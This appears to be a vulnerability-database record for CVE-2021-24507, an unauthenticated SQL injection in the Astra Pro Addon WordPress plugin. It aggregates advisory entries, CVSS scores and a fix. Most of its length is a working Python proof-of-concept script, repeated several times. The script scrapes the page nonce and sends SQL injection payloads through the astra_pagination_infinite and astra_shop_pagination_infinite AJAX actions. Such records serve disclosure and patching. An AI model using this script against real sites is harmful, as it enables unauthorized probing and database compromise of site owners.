Description
The plugin did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues
Related
{"id": "WPEX-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection", "description": "The plugin did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues\n", "published": "2021-07-08T00:00:00", "modified": "2021-08-10T07:14:51", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "Ngoc Nguyen", "references": ["https://wpastra.com/changelog/astra-pro-addon/"], "cvelist": ["CVE-2021-24507"], "immutableFields": [], "lastseen": "2021-09-14T23:15:07", "viewCount": 65, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24507"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C"]}], "rev": 4}, "score": {"value": 5.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24507"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C"]}]}, "exploitation": null, "vulnersScore": 5.2}, "sourceData": "Via astra_pagination_infinite action:\r\n\r\nimport argparse\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup as bs\r\nimport json\r\n\r\nreq.urllib3.disable_warnings()\r\n\r\ndef get_nonce(url):\r\n\r\n\ttry:\r\n\t\theaders = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\r\n\t\tr = req.get(url, headers=headers, allow_redirects=True, verify=False)\r\n\t\tif 'var astra = {' in r.text and 'infinite_nonce' in r.text:\r\n\r\n\t\t\tsoup = bs(r.content, 'html.parser')\r\n\t\t\tastra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1]\r\n\t\t\tdata = json.loads(astra)\r\n\t\t\tnonce = data['infinite_nonce']\r\n\r\n\t\t\treturn nonce, r.url\r\n\texcept Exception as e:\r\n\t\t#raise e\r\n\t\treturn None, None\r\n\r\n\treturn None, None\r\n\r\n\r\ndef send_request(url, nonce, payload):\r\n\r\n\tdata = {\r\n\t\t\"action\": \"astra_pagination_infinite\",\r\n\t\t\"page_no\": \"1\", \r\n\t\t\"nonce\": \"{}\".format(nonce), \r\n\t\t\"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \r\n\t\t\"astra_infinite\": \"astra_pagination_ajax\"\r\n\t\t}\r\n\r\n\theaders = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"}\t\r\n\r\n\turl += '/wp-admin/admin-ajax.php'\r\n\tr = req.post(url, headers=headers, data=data, verify=False)\r\n\treturn r.text\r\n\r\n\r\ndef check_sqli(url, nonce):\r\n\t\r\n\t# grep error base\r\n\tres = send_request(url, nonce, \"'\")\r\n\tif 'database error' in res:\r\n\t\treturn True, 'Vuln to Error-Based.'\r\n\r\n\r\n\t# query 1\r\n\tres1 = send_request(url, nonce, '9656)) and ((7556=1223')\r\n\tres2 = send_request(url, nonce, '9634)) or ((6532=6532')\r\n\r\n\tif res1 == '' and (len(res2) > len(res1)):\r\n\t\treturn True, 'Vuln to Boolean-Based.'\r\n\r\n\r\n\treturn False, 'Not vuln'\t\t\r\n\r\n\r\ndef main():\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\")\r\n\targs = parser.parse_args()\r\n\turl = args.url\r\n\r\n\tnonce, r_url = get_nonce(url)\r\n\tprint(check_sqli(r_url, nonce)[1])\r\n\r\n\r\nmain()\r\n\r\n\r\nVia astra_shop_pagination_infinite action:\r\n\r\nimport argparse\r\nimport requests as req\r\nfrom bs4 import BeautifulSoup as bs\r\nimport json\r\n\r\nreq.urllib3.disable_warnings()\r\n\r\ndef get_nonce(url):\r\n\r\n\ttry:\r\n\t\theaders = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"}\r\n\t\tr = req.get(url, headers=headers, allow_redirects=True, verify=False)\r\n\t\tif 'var astra = {' in r.text and 'shop_infinite_nonce' in r.text:\r\n\r\n\t\t\tsoup = bs(r.content, 'html.parser')\r\n\t\t\tastra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1]\r\n\t\t\tdata = json.loads(astra)\r\n\t\t\tnonce = data['shop_infinite_nonce']\r\n\r\n\t\t\treturn nonce, r.url\r\n\texcept Exception as e:\r\n\t\t#raise e\r\n\t\treturn None, None\r\n\r\n\treturn None, None\r\n\r\n\r\ndef send_request(url, nonce, payload):\r\n\r\n\tdata = {\r\n\t\t\"action\": \"astra_shop_pagination_infinite\",\r\n\t\t\"page_no\": \"1\", \r\n\t\t\"nonce\": \"{}\".format(nonce), \r\n\t\t\"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \r\n\t\t\"astra_infinite\": \"astra_pagination_ajax\"\r\n\t\t}\r\n\r\n\theaders = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"}\t\r\n\r\n\turl += '/wp-admin/admin-ajax.php'\r\n\tr = req.post(url, headers=headers, data=data, verify=False)\r\n\treturn r.text\r\n\r\n\r\ndef check_sqli(url, nonce):\r\n\t\r\n\t# grep error base\r\n\tres = send_request(url, nonce, \"'\")\r\n\tif 'database error' in res:\r\n\t\treturn True, 'Vuln to Error-Based.'\r\n\r\n\r\n\t# query 1\r\n\tres1 = send_request(url, nonce, '9656)) and ((7556=1223')\r\n\tres2 = send_request(url, nonce, '9634)) or ((6532=6532')\r\n\r\n\tif res1 == '' and (len(res2) > len(res1)):\r\n\t\treturn True, 'Vuln to Boolean-Based.'\r\n\r\n\r\n\treturn False, 'Not vuln'\t\t\r\n\r\n\r\ndef main():\r\n\tparser = argparse.ArgumentParser()\r\n\tparser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\")\r\n\targs = parser.parse_args()\r\n\turl = args.url\r\n\r\n\tnonce, r_url = get_nonce(url)\r\n\tprint(check_sqli(r_url, nonce)[1])\r\n\r\n\r\nmain()", "generation": 0, "_state": {"dependencies": 1646269721}}
{"cve": [{"lastseen": "2022-03-23T14:56:02", "description": "The Astra Pro Addon WordPress plugin before 3.5.2 did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T10:15:00", "type": "cve", "title": "CVE-2021-24507", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24507"], "modified": "2021-08-17T16:41:00", "cpe": [], "id": "CVE-2021-24507", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24507", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-09-14T23:15:07", "description": "The plugin did not properly sanitise or escape some of the POST parameters from the astra_pagination_infinite and astra_shop_pagination_infinite AJAX action (available to both unauthenticated and authenticated user) before using them in SQL statement, leading to an SQL Injection issues\n\n### PoC\n\nVia astra_pagination_infinite action: import argparse import requests as req from bs4 import BeautifulSoup as bs import json req.urllib3.disable_warnings() def get_nonce(url): try: headers = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"} r = req.get(url, headers=headers, allow_redirects=True, verify=False) if 'var astra = {' in r.text and 'infinite_nonce' in r.text: soup = bs(r.content, 'html.parser') astra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1] data = json.loads(astra) nonce = data['infinite_nonce'] return nonce, r.url except Exception as e: #raise e return None, None return None, None def send_request(url, nonce, payload): data = { \"action\": \"astra_pagination_infinite\", \"page_no\": \"1\", \"nonce\": \"{}\".format(nonce), \"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \"astra_infinite\": \"astra_pagination_ajax\" } headers = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"} url += '/wp-admin/admin-ajax.php' r = req.post(url, headers=headers, data=data, verify=False) return r.text def check_sqli(url, nonce): # grep error base res = send_request(url, nonce, \"'\") if 'database error' in res: return True, 'Vuln to Error-Based.' # query 1 res1 = send_request(url, nonce, '9656)) and ((7556=1223') res2 = send_request(url, nonce, '9634)) or ((6532=6532') if res1 == '' and (len(res2) > len(res1)): return True, 'Vuln to Boolean-Based.' return False, 'Not vuln' def main(): parser = argparse.ArgumentParser() parser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\") args = parser.parse_args() url = args.url nonce, r_url = get_nonce(url) print(check_sqli(r_url, nonce)[1]) main() Via astra_shop_pagination_infinite action: import argparse import requests as req from bs4 import BeautifulSoup as bs import json req.urllib3.disable_warnings() def get_nonce(url): try: headers = {\"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\"} r = req.get(url, headers=headers, allow_redirects=True, verify=False) if 'var astra = {' in r.text and 'shop_infinite_nonce' in r.text: soup = bs(r.content, 'html.parser') astra = soup.find('script', attrs={'id': 'astra-theme-js-js-extra'}).text.strip()[12:-1] data = json.loads(astra) nonce = data['shop_infinite_nonce'] return nonce, r.url except Exception as e: #raise e return None, None return None, None def send_request(url, nonce, payload): data = { \"action\": \"astra_shop_pagination_infinite\", \"page_no\": \"1\", \"nonce\": \"{}\".format(nonce), \"query_vars\": r'{\"tax_query\":{\"0\":{\"field\":\"term_taxonomy_id\",\"terms\":[\"' + payload + r'\"]}}}', \"astra_infinite\": \"astra_pagination_ajax\" } headers = {\"Cache-Control\": \"max-age=0\", \"Sec-Ch-Ua\": \"\\\" Not A;Brand\\\";v=\\\"99\\\", \\\"Chromium\\\";v=\\\"90\\\"\", \"Sec-Ch-Ua-Mobile\": \"?0\", \"Upgrade-Insecure-Requests\": \"1\", \"User-Agent\": \"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36\", \"Accept\": \"text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\", \"Sec-Fetch-Site\": \"none\", \"Sec-Fetch-Mode\": \"navigate\", \"Sec-Fetch-User\": \"?1\", \"Sec-Fetch-Dest\": \"document\", \"Accept-Encoding\": \"gzip, deflate\", \"Accept-Language\": \"en-US,en;q=0.9\", \"Connection\": \"close\", \"Content-Type\": \"application/x-www-form-urlencoded\"} url += '/wp-admin/admin-ajax.php' r = req.post(url, headers=headers, data=data, verify=False) return r.text def check_sqli(url, nonce): # grep error base res = send_request(url, nonce, \"'\") if 'database error' in res: return True, 'Vuln to Error-Based.' # query 1 res1 = send_request(url, nonce, '9656)) and ((7556=1223') res2 = send_request(url, nonce, '9634)) or ((6532=6532') if res1 == '' and (len(res2) > len(res1)): return True, 'Vuln to Boolean-Based.' return False, 'Not vuln' def main(): parser = argparse.ArgumentParser() parser.add_argument(\"-u\", \"--url\", help='URL', required=\"True\") args = parser.parse_args() url = args.url nonce, r_url = get_nonce(url) print(check_sqli(r_url, nonce)[1]) main()\n", "cvss3": {}, "published": "2021-07-08T00:00:00", "type": "wpvulndb", "title": "Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24507"], "modified": "2021-08-10T07:14:51", "id": "WPVDB-ID:A1A0DC0B-C351-4D46-AC9B-B297CE4D251C", "href": "https://wpscan.com/vulnerability/a1a0dc0b-c351-4d46-ac9b-b297ce4d251c", "sourceData": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "patchstack": [{"lastseen": "2022-06-01T19:31:33", "description": "Unauthenticated SQL Injection (SQLi) vulnerability discovered by Ngoc Nguyen in WordPress Astra Pro premium plugin (versions <= 3.5.1).\n\n## Solution\n\n\r\n Update the WordPress Astra Pro premium plugin to the latest available version (at least 3.5.2).\r\n ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-08T00:00:00", "type": "patchstack", "title": "WordPress Astra Pro premium plugin <= 3.5.1 - Unauthenticated SQL Injection (SQLi) vulnerability", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24507"], "modified": "2021-07-08T00:00:00", "id": "PATCHSTACK:7DC3B805F67FF4143ED4520C27954328", "href": "https://patchstack.com/database/vulnerability/astra-addon/wordpress-astra-pro-premium-plugin-3-5-1-unauthenticated-sql-injection-sqli-vulnerability", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}
Astra Pro Addon < 3.5.2 - Unauthenticated SQL Injection
